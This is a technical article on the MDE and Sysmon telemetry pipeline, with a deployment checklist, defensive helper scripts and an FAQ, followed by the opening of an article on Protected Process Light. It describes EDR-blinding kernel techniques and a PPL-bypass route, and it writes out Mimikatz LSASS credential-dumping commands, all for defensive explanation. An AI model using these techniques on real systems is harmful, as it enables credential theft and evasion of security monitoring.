MDE's end-to-end latency to a queryable Kusto row is seconds to tens of seconds. The endpoint side takes microseconds; the TLS hop to regional ingest takes the dominant fraction of a second; the Kusto write and per-tenant indexing takes the rest. Microsoft's own Advanced Hunting documentation phrases the freshness contract carefully: "Advanced hunting receives this data almost immediately after the sensors that collect them successfully transmit it to the corresponding cloud services" [@advanced-hunting-overview]. "Almost immediately" is empirically a few seconds in steady state, longer under load, and indefinite when the endpoint cannot reach the cloud.

Any payload that completes its work inside the observation window has executed before the SIEM rule could fire. A mimikatz.exe invocation that dumps LSA secrets in three milliseconds, exfiltrates them over a covert DNS channel in 800 milliseconds, and exits in another two milliseconds has produced a complete attack chain before MDE's event has reached Kusto, let alone before the Maya-class analyst has glanced at her console. The hybrid responses that blur this boundary -- Sysmon v14's FileBlockExecutable (EID 27), MDE's ASR rules and Network Protection -- are kernel-callback-time decisions, not SIEM-rule-time decisions; they run inside the few-microsecond window the driver itself owns, and they are constrained by the rule logic baked into the host configuration rather than by the live correlation logic of the cloud-side detection engine.
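The latency argument reduces to one inequality: the chain's total duration against the time until its first event is queryable. A minimal sketch using the section's illustrative mimikatz timings; the 2,000 ms ingestion figure is an assumed placeholder for "a few seconds," not a measured value, and the model ignores per-event variation in latency.

```python
def completes_before_queryable(step_durations_ms: list[float], ingest_latency_ms: float) -> bool:
    """True if an attack chain finishes before its first event becomes queryable.

    Simplifying assumption: the first event is emitted when the chain starts and
    becomes queryable exactly `ingest_latency_ms` later.
    """
    return sum(step_durations_ms) < ingest_latency_ms


# The section's illustrative chain: 3 ms dump, 800 ms DNS exfiltration, 2 ms exit.
chain_ms = [3, 800, 2]
# Placeholder for "a few seconds" of steady-state ingestion latency (an assumption).
print(completes_before_queryable(chain_ms, ingest_latency_ms=2_000))  # True
```

The 805 ms chain beats any ingestion latency above that figure, which is why only host-side, callback-time decisions can act inside the window.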

Ceiling 3: MDE schema truncation versus Sysmon manifest

This is the ceiling §8 quantified column-by-column. The Device* tables surface a normalized, mostly-complete cross-walk of Sysmon's manifest -- but mostly-complete is not the same as complete. The ProcessAccess GrantedAccess mask is the most-cited example: Sysmon EID 10 captures the full 32-bit ACCESS_MASK (which discriminates between PROCESS_QUERY_INFORMATION, PROCESS_VM_READ, PROCESS_CREATE_THREAD, and so on -- the canonical malicious patterns are visible in this mask), while MDE's DeviceEvents OpenProcessApiCall ActionType collapses the mask into a coarser categorization. The WmiEvent consumer expressions Sysmon EIDs 19-21 capture verbatim -- which are how WMI-based persistence is detected -- are not surfaced in the Device* schema at all. RawAccessRead (EID 9, the canonical disk-level credential-theft observable) is omitted. PipeEvent (EIDs 17-18) is omitted.
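To see what the coarser MDE categorization gives up, it helps to decode a GrantedAccess value by hand. A minimal sketch that turns the hex string Sysmon writes into EID 10 (for example `0x1010`, a value frequently cited in LSASS-access detection rules) into the process-specific and standard access-right names from the Windows SDK; unrecognized bits are reported rather than dropped.

```python
# Process-specific and standard access rights as defined in the Windows SDK (winnt.h).
ACCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0004: "PROCESS_SET_SESSIONID",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x2000: "PROCESS_SET_LIMITED_INFORMATION",
    0x00010000: "DELETE",
    0x00020000: "READ_CONTROL",
    0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER",
    0x00100000: "SYNCHRONIZE",
}


def decode_granted_access(granted_access: str) -> list[str]:
    """Decode a Sysmon EID 10 GrantedAccess string such as "0x1010" into right names."""
    mask = int(granted_access, 16)  # int() with base 16 accepts the "0x" prefix
    names = [name for bit, name in sorted(ACCESS_RIGHTS.items()) if mask & bit]
    unknown = mask & ~sum(ACCESS_RIGHTS)  # keys are distinct single bits
    if unknown:
        names.append(f"UNKNOWN(0x{unknown:x})")
    return names


print(decode_granted_access("0x1010"))
# ['PROCESS_VM_READ', 'PROCESS_QUERY_LIMITED_INFORMATION']
```

Names are emitted in ascending bit order, so two masks that differ by a single right produce visibly different lists, which is exactly the discrimination the full mask preserves.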

Hartong's sysmonconfig-mde-augment.xml exists precisely because of this asymmetry. The augment config is a community-curated artifact whose purpose is to fill the schema-truncation gap. The cost: a second telemetry stream on the host. The benefit: detection-engineering visibility into the verbose-EID surface MDE drops.

Ceiling 4: The kernel-mode adversary primitive

A ring-0 attacker with a working kernel primitive -- a memory-write capability into the kernel data structures, typically delivered via BYOVD against a vulnerable signed driver -- can defeat the pipeline as a consequence of defeating the structural defenses that protect it. Specifically:

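A call to PsSetCreateProcessNotifyRoutineEx with Remove = TRUE against the sensor's routine (or, with only a read/write primitive, a write that clears the sensor's entry in the kernel's process-notify callback array) unregisters the EDR sensor's callback, after which CreateProcess events on that host produce no observable.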
A patch to the _EPROCESS.Protection field of MsSense.exe or Sysmon.exe strips the Antimalware-PPL gate, after which user-mode attacks against the service work again.
A direct write into the EtwTi provider's enable or keyword mask zeroes out the security-event-emission surface, after which the EtwTi consumers (the antimalware-PPL processes several EDRs run to subscribe to it) see no events even when the underlying behavior fired.

The "Tampering with Windows Event Tracing" research published by Palantir in 2018 (Matt Graeber's canonical writeup) and the follow-on EtwTi-blinding tradition are the published primary sources for this attack class [@palantir-etw-tampering-2018]. The structural defenses are HVCI plus VBL plus Antimalware-PPL plus ELAM. But the four-component hardening stack does not prevent a kernel-mode adversary primitive from defeating the EDR; it only raises the bar to needing one.

Observation requires execution, and the executing observer has to live in some trust domain the attacker can also reach. A kernel-mode observer (Sysmon, MDE) lives in the same kernel trust domain as the kernel-mode attacker; a hypervisor-rooted observer (for example, a component running under Virtualization-Based Security in VTL1 rather than in the normal kernel) shifts the trust boundary up one level, but does not eliminate it -- the observer-in-VBS is still subject to attacks on the hypervisor itself. There is no architectural place to put the observer that is strictly outside the attacker's reach unless the observer is in different hardware, which is what hardware-rooted Root-of-Trust attestations attempt and what an Anti-Tamper Service Provider (ATSP) is being defined for. EDR sensors will always be co-resident with the adversary at *some* trust boundary. The ceiling is structural.

Four ceilings, four sets of open questions. What is the field working on right now?

13. Open Problems and Active Work

Some questions in this article have no answer in 2026. Five of them are where the field will move next.

The MDE kernel-callback inventory

As §6 established, Microsoft has not published a kernel-callback inventory for the MDE EDR sensor, which is the structural reason Hartong's sysmonconfig-mde-augment.xml exists as a community-curated artifact rather than a Microsoft-published reference. What this section adds is the empirical scaffolding the community uses in the absence of that inventory: the MITRE Engenuity Round 6 (2024) evaluation results [@ms-mitre-2024-blog] plus the Shen et al. whole-graph re-analysis [@arxiv-shen-2024] are the closest published evidence of which MDE detection paths produced an alert during a known emulated technique. Neither covers an end-to-end kernel-callback enumeration comparable to Sysmon's manifest -- they cover outputs (alerts produced) rather than mechanisms (callbacks registered). Closing this gap would require either Microsoft to publish a per-ActionType-to-per-kernel-callback cross-walk for the Device* schema, or the community to fund and publish a reverse-engineered inventory that goes meaningfully past the FalconForce 2022 and InfoGuard 2025 slices. As of 2026, neither has happened.

Defender XDR built-in detection rule logic

The AlertInfo and AlertEvidence table schemas are published; the underlying rule logic that produces alerts in these tables is not. Microsoft ships "Microsoft-authored detection rules" as part of Defender for Endpoint Plan 2, and the rules update continuously without an obvious public changelog. The community workaround is to subscribe to the MITRE ATT&CK evaluation rounds (the most recent being Round 6 in 2024 [@ms-mitre-2024-blog][@arxiv-shen-2024]) and infer rule coverage from per-technique detection scores, but this is indirect and lossy. A published rule-logic catalogue would let detection-engineering teams reason about which custom rules are duplicates of Microsoft's authored content and which fill genuine gaps.

Cross-tenant hunting and data sovereignty

MSSPs (managed-security service providers) routinely need to hunt across multiple customer tenants for shared-IOC observations. Microsoft's official multi-tenant story is Microsoft Defender XDR Multitenant Management (in GA) plus Azure Lighthouse for cross-tenant Sentinel access. Both are functional and both are documented at the operational level. The deeper question -- what is the GDPR/HIPAA/FedRAMP framework around hunting an IOC observed in Tenant A against telemetry held in Tenant B's regional Kusto cluster? -- is unsettled. The data-residency commitments Microsoft makes per region [@ms-server-endpoints-learn] do not directly answer the cross-tenant-hunt question. Vendor and customer guidance is still maturing.

A Microsoft-published reference MDE-augmentation Sysmon config

Hartong's config is the community answer to the question "what Sysmon EIDs should I emit on a host that already has MDE?" There is no Microsoft-published reference equivalent. This is the most surgical near-term improvement Microsoft could make. Publishing such a config -- even as a starting-point template, not a binding recommendation -- would compress an entire detection-engineering conversation into a single endorsed artifact. The political reason it has not happened is partly that Microsoft does not officially recommend running Sysmon alongside MDE; the operational reality is that detection-engineering-mature shops do anyway.

Cross-platform parity

Sysmon for Linux (microsoft/SysmonForLinux, created October 28, 2020 and publicly announced in October 2021) ships an eBPF-based implementation of the same XML schema and emits to syslog [@github-sysmon-linux]. It is a substantial subset of the Windows manifest -- process create, file write, network connect, image load, raw access read -- with the cross-OS shared XML rule grammar going for it, so a detection-engineering team can write one Sigma-aligned rule and run it against both Windows and Linux endpoints with minor token substitutions. Full parity between the Windows kernel-callback Sysmon and the Linux eBPF Sysmon is not the design intent; the Linux port intentionally captures only the EIDs that map cleanly onto eBPF observables. BTFHub plus SysinternalsEBPF (the in-tree CO-RE infrastructure the Linux port uses) make per-kernel-version deployments tractable, but the field has not yet converged on a single canonical Linux config the way it converged on SwiftOnSecurity for Windows.

These five open problems are where the field will move in the next five years. In the meantime, what does the analyst do on Monday morning?

14. Seven Things to Do Monday Morning

Everything above has been background. Here is the operational checklist. Each step is anchored to a primary citation. Walk all seven on a single non-production host before fleet rollout; the ninety-second triage walk from §1 is best learned by reproducing it once on your own tenant.

1. Verify the MDE sensor service is healthy

Run as Administrator on the endpoint:

sc query sense

A healthy result shows STATE: 4 RUNNING and WIN32_EXIT_CODE: 0. If the result is STATE: 1 STOPPED or the service is missing entirely, consult the WDATPOnboarding event source in the Application event log for events 5, 10, 15, 30, 35, 40, 65, and 70 -- each has a documented resolution procedure [@sense-troubleshoot]. On Windows Server 2019, 2022, 2025, or Azure Stack HCI 23H2 or later, also verify the Feature on Demand is installed:

DISM.EXE /Online /Get-CapabilityInfo /CapabilityName:Microsoft.Windows.Sense.Client~~~~

The result should show State : Installed and Version : 10.x.x.x. If State : NotPresent, install the FoD before proceeding.
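If you script step 1 across a pilot group, the two checks reduce to pattern matches on command output. A minimal sketch, assuming the usual `sc query` layout (`STATE : 4 RUNNING`, `WIN32_EXIT_CODE : 0 (0x0)`) and a `State : Installed` line in the DISM output; the parsing functions are pure so they can be tested anywhere, and the command is only run on Windows.

```python
import re
import subprocess
import sys
from typing import Optional, Tuple


def parse_sc_state(sc_output: str) -> Optional[Tuple[int, int]]:
    """Return (STATE code, WIN32_EXIT_CODE) from `sc query` text, or None if absent."""
    state = re.search(r"^\s*STATE\s*:\s*(\d+)", sc_output, re.MULTILINE)
    exit_code = re.search(r"^\s*WIN32_EXIT_CODE\s*:\s*(\d+)", sc_output, re.MULTILINE)
    if state is None or exit_code is None:
        return None  # e.g. service missing: sc prints an OpenService error instead
    return int(state.group(1)), int(exit_code.group(1))


def sense_is_healthy(sc_output: str) -> bool:
    """Step 1's health test: STATE 4 (RUNNING) with WIN32_EXIT_CODE 0."""
    return parse_sc_state(sc_output) == (4, 0)


def capability_installed(dism_output: str) -> bool:
    """True if DISM /Get-CapabilityInfo output contains a `State : Installed` line."""
    return re.search(r"^\s*State\s*:\s*Installed\s*$", dism_output, re.MULTILINE) is not None


if __name__ == "__main__" and sys.platform == "win32":
    result = subprocess.run(["sc.exe", "query", "sense"], capture_output=True, text=True)
    print("SENSE healthy:", sense_is_healthy(result.stdout))
```

Calling `sc.exe` explicitly avoids PowerShell's `sc` alias for `Set-Content` if the script is ever adapted to run through a shell.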

2. Open Advanced Hunting and run the §8 query

Navigate to defender.microsoft.com (or the legacy security.microsoft.com), expand Hunting > Advanced hunting, paste the §8 KQL query, and run it [@advanced-hunting-overview]. On a fresh tenant the query may return zero rows -- that is the correct result for a healthy environment. Tighten the time window if it is slow (Timestamp > ago(1h) instead of ago(24h)) until the query returns within ten seconds. The point of this step is to confirm the read surface is reachable and that your account holds a role that permits Advanced hunting queries on the tenant.
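The same reachability check can also be scripted outside the portal. A minimal sketch, assuming the Microsoft Graph v1.0 `security/runHuntingQuery` endpoint and an access token already obtained by your own auth flow (token acquisition, and the ThreatHunting.Read.All permission it needs, are not shown). The function only builds the request; nothing is sent until you call `urlopen`. The KQL string is a placeholder smoke test, not the §8 query.

```python
import json
import urllib.request

# Microsoft Graph v1.0 advanced hunting endpoint (needs ThreatHunting.Read.All).
HUNTING_URL = "https://graph.microsoft.com/v1.0/security/runHuntingQuery"


def build_hunting_request(kql: str, access_token: str) -> urllib.request.Request:
    """Build (but do not send) a POST request that runs `kql` via Advanced Hunting."""
    body = json.dumps({"Query": kql}).encode("utf-8")
    return urllib.request.Request(
        HUNTING_URL,
        data=body,
        method="POST",
        headers={
            "Authorization": f"Bearer {access_token}",
            "Content-Type": "application/json",
        },
    )


# Placeholder smoke test using the tightened one-hour window from this step.
SMOKE_TEST_KQL = "DeviceProcessEvents | where Timestamp > ago(1h) | take 10"
req = build_hunting_request(SMOKE_TEST_KQL, access_token="<token from your auth flow>")
# urllib.request.urlopen(req) would send it; the JSON response carries "schema" and "results".
```

An HTTP 403 from this call usually points at the same permission problem the portal check is designed to surface.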

3. If licensed for Sentinel, install the Defender XDR connector

In the Microsoft Sentinel workspace, navigate to Data connectors, choose Microsoft Defender XDR, and configure per-table streaming [@sentinel-xdr-connector]. Pick the tables your team needs longer retention or analytics-rule scheduling on; leave the others to in-portal Advanced Hunting. Be aware that enabling the connector "automatically disconnects" any legacy Microsoft Defender component connectors during enablement; this is the cleanup detail to plan for during migration windows [@sentinel-xdr-connector].

4. If deploying Sysmon alongside MDE, start from the augment config

Clone olafhartong/sysmon-modular, build the sysmonconfig-mde-augment.xml variant, and deploy with:

Sysmon64.exe -accepteula -i sysmonconfig-mde-augment.xml

Verify the active configuration with Sysmon64.exe -c and confirm the rule count matches the augment config's expected output [@github-hartong-modular].
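Before pushing a config to a fleet, it can help to summarize what each event type will actually log, for example to confirm that ProcessCreate is effectively off in the augment config. A minimal sketch that reads the XML file (not the `-c` dump), assuming Sysmon's documented convention that an empty `onmatch="include"` filter logs nothing and an empty `onmatch="exclude"` filter logs everything. It does not evaluate rule conditions or reproduce Sysmon's precedence when both filter kinds exist for one event type; the sample config is made up.

```python
import xml.etree.ElementTree as ET


def summarize_filters(config_xml: str) -> dict[str, list[str]]:
    """Summarize, per event type, what each Sysmon filter in a config would log."""
    root = ET.fromstring(config_xml)
    event_filtering = root.find("EventFiltering")
    if event_filtering is None:
        return {}
    # Filters may sit inside RuleGroup wrappers (typical of merged sysmon-modular
    # output) or directly under EventFiltering (older hand-written configs).
    filters = []
    for child in event_filtering:
        filters.extend(list(child) if child.tag == "RuleGroup" else [child])
    summary: dict[str, list[str]] = {}
    for event_filter in filters:
        onmatch = event_filter.get("onmatch", "")
        has_rules = len(event_filter) > 0
        if onmatch == "include":
            status = "subset (include rules)" if has_rules else "off"
        elif onmatch == "exclude":
            status = "subset (exclude rules)" if has_rules else "all"
        else:
            status = "unknown onmatch"
        summary.setdefault(event_filter.tag, []).append(status)
    return summary


SAMPLE = """<Sysmon schemaversion="4.90">
  <EventFiltering>
    <RuleGroup name="" groupRelation="or">
      <ProcessCreate onmatch="include"/>
    </RuleGroup>
    <RuleGroup name="" groupRelation="or">
      <ProcessAccess onmatch="include">
        <TargetImage condition="end with">lsass.exe</TargetImage>
      </ProcessAccess>
    </RuleGroup>
  </EventFiltering>
</Sysmon>"""

print(summarize_filters(SAMPLE))
# {'ProcessCreate': ['off'], 'ProcessAccess': ['subset (include rules)']}
```

For a real file, pass `open(path, encoding="utf-8").read()`, or switch to `ET.parse(path).getroot()` if the file carries an XML encoding declaration.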

5. If deploying Sysmon standalone, start from NextronSystems or modular default

For air-gapped or unlicensed environments, clone NextronSystems/sysmon-config (the post-2021-rename successor to Neo23x0/sysmon-config) and deploy sysmonconfig.xml or, for the blocking-rule variant, sysmonconfig-export-block.xml [@github-neo23x0][@github-nextronsystems-meta]. Alternatively, olafhartong/sysmon-modular's default sysmonconfig.xml (built from the modular library) is the right choice if you want fine-grained per-technique tuning later [@github-hartong-modular].

6. Verify Sysmon v15.2 or later is running

Sysmon64.exe -c

The output's header line should show the binary version. Anything v15.x or later has the protected-process gate enabled [@sysmon-ms-learn][@bleepingcomputer-sysmon15]. Anything older is trivially blindable by a SYSTEM-privilege attacker and is the single biggest deployment-hygiene risk in the Sysmon population today.
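When this check is automated, the version comparison is the easy place to slip. A minimal sketch, assuming the banner line has the form `System Monitor vMAJOR.MINOR - ...`; it compares integer tuples because a string comparison would rank v15.15 below v15.2.

```python
import re
from typing import Optional, Tuple


def sysmon_version(banner: str) -> Optional[Tuple[int, int]]:
    """Extract (major, minor) from a banner line such as 'System Monitor v15.15 - ...'."""
    match = re.search(r"System Monitor v(\d+)\.(\d+)", banner)
    return (int(match.group(1)), int(match.group(2))) if match else None


def meets_floor(banner: str, floor: Tuple[int, int] = (15, 2)) -> bool:
    """True if the reported version is at or above `floor` (default: this step's v15.2)."""
    version = sysmon_version(banner)
    # Compare integer tuples, not strings: as text, "15.15" sorts below "15.2".
    return version is not None and version >= floor


print(meets_floor("System Monitor v15.15 - System activity monitor"))  # True
```

A banner that does not parse is treated as a failure, so a missing or renamed binary surfaces as a finding rather than a silent pass.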

7. Audit the MDE onboarding registry hives

Compare the live registry values to the expected onboarding state:

reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection"
reg query "HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status"

Unexpected changes -- particularly a change to the onboarding OrgId or to the policy-controlled Disabled value -- are an indicator that the tenant or device has been re-targeted, possibly by an attacker who obtained admin-level access and is attempting to re-route the endpoint's telemetry to a different tenant or to disable the MDE sensor entirely [@sense-troubleshoot]. Set up a Sentinel detection rule on DeviceRegistryEvents with RegistryKey contains "Windows Advanced Threat Protection" to surface this class of tampering automatically.
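Between detection-rule firings, a periodic host-side diff against a known-good baseline catches the same class of change. A minimal sketch, assuming the usual `reg query` text layout (a key-path header line, then value lines indented four spaces with name, type and data separated by four spaces). The `OnboardingState` value name and the sample GUID fragments in the usage are illustrative assumptions; capture your baseline from a host you know is correctly onboarded.

```python
import re


def parse_reg_query(output: str) -> dict[str, tuple[str, str]]:
    """Map value name -> (type, data) from `reg query` text output."""
    values: dict[str, tuple[str, str]] = {}
    for line in output.splitlines():
        if not line.startswith("    "):
            continue  # blank lines and HKEY_... key-path header lines
        parts = re.split(r" {4}", line.strip(), maxsplit=2)
        if len(parts) >= 2 and parts[1].startswith("REG_"):
            data = parts[2] if len(parts) == 3 else ""  # empty REG_SZ has no data column
            values[parts[0]] = (parts[1], data)
    return values


def diff_against_baseline(current: dict[str, tuple[str, str]],
                          baseline: dict[str, tuple[str, str]]) -> dict[str, tuple]:
    """Return {name: (baseline_value, current_value)} for every added, removed or changed value."""
    names = current.keys() | baseline.keys()
    return {n: (baseline.get(n), current.get(n))
            for n in sorted(names) if baseline.get(n) != current.get(n)}


# Illustrative usage with made-up values.
sample = ("\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Advanced Threat Protection\\Status\n"
          "    OnboardingState    REG_DWORD    0x1\n"
          "    OrgId    REG_SZ    11111111-aaaa\n")
baseline = parse_reg_query(sample)
print(diff_against_baseline(baseline, baseline))  # {}
```

Any non-empty diff on `OrgId` is the re-targeting signal this step describes and deserves the same triage as the detection rule.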

Note: The cost of getting steps 4-6 wrong (deploying the wrong Sysmon config on a high-volume server fleet) is hours of operational pain; the cost of doing them right on a single test host first is twenty minutes.

If `sc query sense` reports that the service does not exist, the MDE sensor has not been onboarded on this host. Two common causes: (1) the endpoint is on a Windows Server SKU and the SENSE Feature on Demand has not been installed; run the DISM `Get-CapabilityInfo` check in step 1 to confirm. (2) The onboarding script (the `WindowsDefenderATPLocalOnboardingScript.cmd` or the equivalent Group Policy / Intune / SCCM artifact) has not been run on this host. The MDE settings page in the Defender XDR portal shows the per-device onboarding artifacts under **Settings > Endpoints > Onboarding** for download [@sense-troubleshoot].

The Defender XDR portal also exposes a device timeline view that surfaces a chronological event stream per device without requiring KQL. This is the right view for analysts who are still learning the schema; the KQL surface is the right view for repeatable hunts and detection-rule authoring.

Seven steps, one Monday. The rest of the questions are in the FAQ.

15. Frequently Asked Questions

Seven of the questions that come up every time this material is taught.

Yes on its output side; mostly no on its input side. Sysmon publishes its events through an ETW provider called `Microsoft-Windows-Sysmon`, which is how downstream collectors and the Windows Event Log service consume the data. On its *input* side, Sysmon is a kernel driver that collects via six different mechanisms -- `PsSetCreateProcessNotifyRoutineEx` for process create and exit, `PsSetLoadImageNotifyRoutine` for image load and driver load, `PsSetCreateThreadNotifyRoutineEx` for remote-thread creation, `ObRegisterCallbacks` for cross-process access, `CmRegisterCallbackEx` for registry, and Filter Manager minifilters for ordinary file system and NPFS named pipes. Two exceptions live on Sysmon's input side. The first is its single kernel-ETW consumer, `Microsoft-Windows-DNS-Client`, for EID 22 DNSEvent; the second is the WmiEvent family (EIDs 19-21), implemented in a consumer style against the WMI activity provider's user-mode tracing surface. Calling Sysmon "ETW-based" without that distinction is the most common architectural confusion in the field [@sysmon-ms-learn].

For most organizations licensed for MDE Plan 2 and without a mature detection-engineering team, yes -- MDE alone is the right baseline. For organizations with a detection-engineering team, the community pattern is to deploy MDE *plus* a tuned Sysmon configuration (specifically Olaf Hartong's `sysmonconfig-mde-augment.xml`) that fills the gaps where MDE's `Device*` schema truncates or omits fields that Sysmon's manifest captures verbatim -- the `ProcessAccess` GrantedAccess mask, the full WMI consumer expressions, RawAccessRead, the pipe events, and selected file-delete archival paths. The wrong answer for an MDE-licensed shop with a detection-engineering team is to do nothing on the Sysmon side; the next-worst answer is to deploy *default* Sysmon alongside MDE, which produces double the telemetry volume for the coverage of one [@github-hartong-modular][@mde-ms-learn].

The five class-specific `Device*` tables (`DeviceProcessEvents`, `DeviceNetworkEvents`, `DeviceFileEvents`, `DeviceImageLoadEvents`, `DeviceRegistryEvents`) each map onto a single Sysmon EID family and present a normalized, per-class set of columns. `DeviceEvents` is the miscellaneous catch-all: AMSI scan results, exploit-protection events, Defender Antivirus operational events, Attack Surface Reduction rule fires, Network Protection blocks, OpenProcess API calls, and other MDE-specific telemetry surface here under different `ActionType` values. If a row's `ActionType` does not match what you expected, the row is probably in `DeviceEvents` rather than the table you searched first [@advanced-hunting-overview].

No. The historical root is SwiftOnSecurity's `sysmon-config`, created on February 1, 2017 per the GitHub REST API [@github-swiftonsecurity-meta]. Florian Roth (`@Neo23x0`) forked SwiftOnSecurity's repository in January 2018 and added blocking-rule support, community pull-request merges, and the maintainer roster that now includes Tobias Michalski, Christian Burkard, and Nasreddine Bencherchali [@github-neo23x0]. The Neo23x0 repository was renamed to `NextronSystems/sysmon-config` on July 24, 2021 [@github-nextronsystems-meta]; the old URL HTTP-301 redirects to the new one and the content lineage from SwiftOnSecurity is unchanged. Calling Roth's config "the original" is the inverse of the truth; calling it "the canonical actively-maintained fork" is closer.

No. Sysmon supports one active configuration at a time. There is no aggregate-multiple-XMLs feature at the driver layer. Olaf Hartong's modular workflow generates a single merged XML at build time from a per-technique module library; the production fleet receives that single XML and the driver enforces it. If you want two configurations -- one for the SOC team's hunting, one for the platform team's audit -- merge the rules at build time and ship the combined product [@github-hartong-modular].

Because it runs as Antimalware Protected Process Light (`PROTECTED_ANTIMALWARE_LIGHT`), the Windows kernel rejects ordinary user-mode `OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_DUP_HANDLE)` requests against the process from any caller that does not itself run at an equal or higher signer level. The published reverse-engineering technique (FalconForce 2022) is to raise the Windows PE debug server `dbgsrv.exe` to the `WinTcb` signer level via a PPLKiller-class kernel primitive, then attach the elevated debug server to `MsSense.exe`. That technique requires a kernel-mode primitive (commonly a BYOVD chain), which is itself non-trivial. The protection level is the structural defense; the debug-server technique is the established community workaround [@falconforce-2022].

Thirty days of raw data in the Defender XDR portal: "*Advanced hunting is a query-based threat hunting tool that you use to explore up to 30 days of raw data*" [@advanced-hunting-overview]. Beyond thirty days, retention is configurable per workspace via the Microsoft Sentinel Defender XDR connector; the Log Analytics workspace archive tier supports up to twelve years of per-table archive on a per-GB-billed basis [@sentinel-xdr-connector][@ms-log-analytics-archive]. The two surfaces are not exclusive; the common operational pattern is in-portal for the hunting team (30 days, no per-GB cost) plus per-table Sentinel streaming for the analytics-rules team (extended retention, per-GB cost on selected tables).

These are the questions. The seven layers between Maya's cmd.exe at 9:14 a.m. and her Kusto row at 9:14:03 are how the answers actually work -- a kernel callback, a user-mode aggregator, an ETW publisher or TLS-pinned cloud forwarder, a regional Kusto ingest, a table write, and a KQL read, with two structural defenses (Antimalware-PPL and the Sysmon v15 protected-process gate) keeping each layer honest. Every other detection-engineering pattern in the Windows field is a configuration of those seven layers, and most of the open problems are at the seams between them.

See also. The Sysmon driver's collection layer leans on the kernel-callback APIs documented in the Windows process mitigations and Object Manager namespace articles in this series. The ETW transport bus that Sysmon publishes onto -- and that EtwTi security events surface through -- is the subject of the dedicated ETW article in this series; the article goes deeper on provider GUIDs, manifests, and the eight-trace-session manifest-provider cap that bounds Sysmon's coexistence story in §10. The AMSI primary path that produces DeviceEvents ActionType = "AmsiScriptDetection" is the subject of the AMSI article; the two pipelines are siblings, not substitutes. And the Sigma rule corpus that compiles down into KQL for Defender XDR / Sentinel hunting is the same Sigma corpus that compiles into Splunk SPL and Elastic EQL -- the vendor-neutral query layer that sits above this article's KQL surface [@github-sigma].

Protected Process Light: When the Administrator Isn't Enough

noreply@paragmali.com (Parag Mali) — Tue, 12 May 2026 00:00:00 GMT

**Windows Protected Process Light (PPL) re-asks the question of who can touch whom one level below the token model.** A single byte in `EPROCESS` packs a process's protection type, audit bit, and signer rung; the kernel's lattice check inside `NtOpenProcess` rejects memory-read attempts from below the target's rung even when the caller is SYSTEM with `SeDebugPrivilege` enabled. Every public bypass since 2018 lives in one structural class -- the kernel verifies the channel by which code enters a PPL, not the behaviour of that code once mapped -- which is why Microsoft classifies PPL as defense in depth rather than a security boundary, and why Credential Guard / `LsaIso.exe` is its necessary VBS-anchored companion.

1. Mimikatz on a Protected Box

A red-team operator has done everything right. The shell runs at SYSTEM integrity. SeDebugPrivilege is enabled in the token. whoami /priv shows every privilege Windows defines. The operator types mimikatz.exe, then privilege::debug -- OK. Then sekurlsa::logonpasswords -- and Mimikatz answers:

ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory : (0x00000005) Access is denied

The mechanism that just denied them is not a privilege check at all. It is not an ACL decision. It is not the integrity-level mediator. itm4n recreated exactly this failure in 2021 against a vanilla Windows install with one registry value set [@itm4n-runasppl]. The error code 0x00000005 is ERROR_ACCESS_DENIED -- the Win32 surface that GetLastError exposes for the kernel's NTSTATUS STATUS_ACCESS_DENIED = 0xC0000022. The kernel returns the NTSTATUS out of NtOpenProcess before the security descriptor of lsass.exe has been consulted; RtlNtStatusToDosError then maps it to the Win32 0x5 that surfaces in kuhl_m_sekurlsa.c.
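The error line and the kernel's return value are the same failure seen through two layers. A minimal JavaScript sketch of that translation, assuming the standard 32-bit NTSTATUS layout (two severity bits, a customer bit, a reserved bit, a 12-bit facility, a 16-bit code). The one-entry `NTSTATUS_TO_WIN32` map is a hypothetical stand-in for the real RtlNtStatusToDosError table, which covers far more codes.

```javascript
// Split a 32-bit NTSTATUS into its fields.
function decodeNtStatus(status) {
  return {
    severity: status >>> 30,            // 0 success, 1 informational, 2 warning, 3 error
    customer: (status >>> 29) & 0x1,    // 1 = customer-defined (non-Microsoft) code
    facility: (status >>> 16) & 0x0fff, // 12-bit facility
    code: status & 0xffff,              // 16-bit code within the facility
  };
}

// Hypothetical one-entry stand-in for RtlNtStatusToDosError's mapping table.
const NTSTATUS_TO_WIN32 = new Map([
  [0xC0000022, 5], // STATUS_ACCESS_DENIED -> ERROR_ACCESS_DENIED
]);

function toWin32(status) {
  const win32 = NTSTATUS_TO_WIN32.get(status >>> 0);
  return win32 === undefined ? null : win32;
}

const STATUS_ACCESS_DENIED = 0xC0000022;
console.log(decodeNtStatus(STATUS_ACCESS_DENIED)); // { severity: 3, customer: 0, facility: 0, code: 34 }
console.log('0x' + toWin32(STATUS_ACCESS_DENIED).toString(16).padStart(8, '0')); // 0x00000005
```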

Protected Process Light (PPL): A kernel-enforced gating model that decorates a process with a *protection level* -- a structured byte combining a type field, an audit bit, and a signer rung -- and rejects `OpenProcess` requests from callers whose protection level is below the target's, regardless of token privileges or security-descriptor ACLs.

Picture the scenario concretely. A 2026 red-team engagement against a hardened Windows 11 24H2 endpoint. RunAsPPL audit-mode is on by default after the Windows 11 22H2 rollout extended audit-default to consumer SKUs [@learn-runasppl]. A third-party EDR daemon is already running, signed at the Antimalware rung via the vendor's Microsoft Virus Initiative enrollment. The operator owns local administrator. The operator has SYSTEM. The operator holds every privilege Windows defines. They still cannot read a single byte of LSASS memory.

